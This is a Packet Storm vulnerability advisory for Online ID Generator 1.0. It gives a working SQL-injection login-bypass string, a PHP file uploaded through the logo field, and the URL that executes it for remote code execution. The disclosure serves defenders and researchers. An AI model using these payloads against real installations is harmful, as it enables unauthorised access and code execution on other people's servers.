Lucene search

K
packetstormNu11secur1tyPACKETSTORM:174419
HistoryAug 31, 2023 - 12:00 a.m.

Online ID Generator 1.0 SQL Injection / Shell Upload

2023-08-3100:00:00
nu11secur1ty
packetstormsecurity.com
214
vulnerability
sql injection
shell upload
remote code execution
security
exploit
online-id-generator 1.0
nu11secur1ty
file upload
bypass login
vulnerable system
`## Title: Online-ID-Generator-1.0-SQLi-Bypass-login-ShellUpload-RCE  
## Author: nu11secur1ty  
## Date: 08/31/2023  
## Vendor: https://www.youtube.com/watch?v=JdB9_po5DTc  
## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip  
## Reference: https://portswigger.net/web-security/sql-injection  
## Reference: https://portswigger.net/web-security/file-upload  
## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload  
  
  
## Description:  
hat-trick: The system of this pseudo developer is vulnerable to SQLi,  
Shell Upload, and RCE at the same time.  
This system must be terminated. To all users who like and follow this  
person: Please STOPT DOING THIS!  
THIS WILL BE YOUR RESPONSIBLE WHEN YOU LOSE MONEY OR WHATEVER  
IMPORTANT FOR YOU! BR @nu11secur1ty  
  
  
STATUS: HIGH-CRITICAL Vulnerability  
  
[+]Bypass login SQLi:  
# In login form, for user:  
  
```mysql  
nu11secur1ty' or 1=1#  
```  
  
[+]Shell Upload exploit:  
## For system logo:  
```php  
<?php  
phpinfo();  
?>  
```  
[+]RCE Exploit  
## Execution from the remote browser:  
```URLhttp://localhost/id_generator/uploads/1693471560_info.php  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-ID-Generator-1.0)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html)  
  
## Time spend:  
00:10:00  
  
  
`